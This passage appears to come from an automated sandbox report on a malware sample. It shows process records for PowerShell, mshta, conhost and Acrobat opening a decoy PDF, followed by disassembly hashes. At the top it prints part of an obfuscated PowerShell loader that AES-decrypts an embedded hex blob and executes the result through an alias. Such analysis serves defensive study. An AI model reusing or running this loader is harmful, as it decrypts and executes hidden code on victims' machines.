84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:04:38:03
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:04:38:06
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"
                                          Imagebase:0x7ff651090000
                                          File size:5'641'176 bytes
                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:12
                                          Start time:04:38:07
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                          Imagebase:0x7ff70df30000
                                          File size:3'581'912 bytes
                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:13
                                          Start time:04:38:08
                                          Start date:31/12/2024
                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                          Imagebase:0x7ff70df30000
                                          File size:3'581'912 bytes
                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFD345433B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2182817199.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction ID: 5d7fcb5bbf17594a2fd62b4d39bec78ad26d850823527c364f545537ea33e4f1
                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction Fuzzy Hash: 5001677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665DB36E882CB45

                                            Non-executed Functions

                                            Function 00007FFD345416BF Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2182817199.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,O_^
                                            • API String ID: 0-26621967
                                            • Opcode ID: 794608bd86097eae8ede299548306c8d56f01b42f7e93df306350224d2d46f81
                                            • Instruction ID: b380c3c930f0940d753094a54ad2a28e2ebfe0f1fecf0f7106afbbf10cc2beba
                                            • Opcode Fuzzy Hash: 794608bd86097eae8ede299548306c8d56f01b42f7e93df306350224d2d46f81
                                            • Instruction Fuzzy Hash: 70416F93E0E7C61BE723963918FA0D52F95DF63268B0950F7C695CE193EC0C285BA212
                                            Function 00007FFD3454203D Relevance: .8, Instructions: 754COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2182817199.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b886421524f4245c3df3e29b1aae2c085cf69f05a124e0113ddaa3311c5d062f
                                            • Instruction ID: 338034545d429bfa1611a6920927cb55db8cd2d980c0026578c97be7bc1cabe4
                                            • Opcode Fuzzy Hash: b886421524f4245c3df3e29b1aae2c085cf69f05a124e0113ddaa3311c5d062f
                                            • Instruction Fuzzy Hash: 8532A267E0E6E24FE313966958F50E53FA0EF532A470900F7D2D4CF193E91DA80A9761

                                            Executed Functions

                                            Function 000002506DDA0206 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000003.2486290590.000002506DDA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002506DDA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_3_2506dda0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e973ceb6a3293302bce5bb30a9d064579dda0fc6adae09a0b234fd4d5a1f0b5
                                            • Instruction ID: e3fa66bdf7d0d79baacb5bfc717eb0dfbd90a39b1cd27c246265b235f00119dd
                                            • Opcode Fuzzy Hash: 2e973ceb6a3293302bce5bb30a9d064579dda0fc6adae09a0b234fd4d5a1f0b5
                                            • Instruction Fuzzy Hash: 6B1102A210DF840FE74A627A8C6D3783BC4CB46382F0D40EB9046CB1E7E8194C918356
                                            Function 000002506DCC0FA9 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000003.2486316444.000002506DCC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002506DCC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_3_2506dcc0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction ID: e638a0eea040c1601b3f62b3bd13f95736bffc3f12a607d6b38c2e26f0bc3799
                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction Fuzzy Hash: 499002454A590B55D41415930C9925C50446388261FD444C0551A90144D45D02E66156
                                            Function 000002506DCC0FB9 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000003.2486316444.000002506DCC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002506DCC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_3_2506dcc0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction ID: e638a0eea040c1601b3f62b3bd13f95736bffc3f12a607d6b38c2e26f0bc3799
                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction Fuzzy Hash: 499002454A590B55D41415930C9925C50446388261FD444C0551A90144D45D02E66156
                                            Function 000002506DCC0FB1 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000003.2486316444.000002506DCC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002506DCC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_3_2506dcc0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction ID: e638a0eea040c1601b3f62b3bd13f95736bffc3f12a607d6b38c2e26f0bc3799
                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                            • Instruction Fuzzy Hash: 499002454A590B55D41415930C9925C50446388261FD444C0551A90144D45D02E66156

                                            Executed Functions

                                            Function 00007FFD33240651 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2480881193.00007FFD33240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ffd33240000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: t73
                                            • API String ID: 0-1466958040
                                            • Opcode ID: 8df67050557615d2abf8ba491f0324337b3c957c6280a04bf4969dc4cd5ae511
                                            • Instruction ID: 9f0fd4a0c1f445b8625f5e7673f442eca2b88ff35aee21c3c7ace9bed41939f7
                                            • Opcode Fuzzy Hash: 8df67050557615d2abf8ba491f0324337b3c957c6280a04bf4969dc4cd5ae511
                                            • Instruction Fuzzy Hash: 46617A36B0DA8D0FE7A5972C45786B5BBE1EF96310B1840BBD18DC7193DD29AC41C741
                                            Function 00007FFD332447D9 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2480881193.00007FFD33240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ffd33240000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a24ef1dfacf7f5e94e38079c0b3f49de7bb611ca006dedbffa6297c367c1b2d
                                            • Instruction ID: 0dae794ac01933b61c49ae00e0a3a00cb42edd68fe5626d7df981121aa7acf3d
                                            • Opcode Fuzzy Hash: 2a24ef1dfacf7f5e94e38079c0b3f49de7bb611ca006dedbffa6297c367c1b2d
                                            • Instruction Fuzzy Hash: E811E616F0EECA0BE796A66C193527461D2EFE6651B5900BBE61CD31A3DC19DC454340
                                            Function 00007FFD331743C5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2480269892.00007FFD33170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ffd33170000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction ID: fbbe0ce5fa4b9b968676190feb34939ee699eb310161c03fb588ffc2e784a296
                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction Fuzzy Hash: A101843121CB084FDB44EF0CE451AA5B3E0FB95320F10056EE58AC3651DA22E882CB41
                                            Function 00007FFD332439C5 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2480881193.00007FFD33240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ffd33240000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a008a9fa9f62aaa2a0262befb8ca4ae82c14d31a03d26cbf18820c84615ec72
                                            • Instruction ID: a21bf64b00b4da3326658ec2085e67a9bee6edf0509e05a60152a15d968e1f43
                                            • Opcode Fuzzy Hash: 7a008a9fa9f62aaa2a0262befb8ca4ae82c14d31a03d26cbf18820c84615ec72
                                            • Instruction Fuzzy Hash: 8DE0DF17B0FACA4FE291B66C24211A8A7D1EB8A2A1B1441FBE14EC71A7DC595C094340
                                            Function 00007FFD3324399F Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2480881193.00007FFD33240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_7ffd33240000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cfb6653dfc86b9e0b9fe45edb2c32fc6f4c82b273477ab6389eaea3525d3b23
                                            • Instruction ID: 7fa75c162fd45e3e1bd8ed15b02acf00e633eb41e02cab7c5df49fd37be77a8a
                                            • Opcode Fuzzy Hash: 0cfb6653dfc86b9e0b9fe45edb2c32fc6f4c82b273477ab6389eaea3525d3b23
                                            • Instruction Fuzzy Hash: F9D0221770E94E4FF264B50C251617CB3D0EBCA2A673047F7C24EC71A2D813C80A1300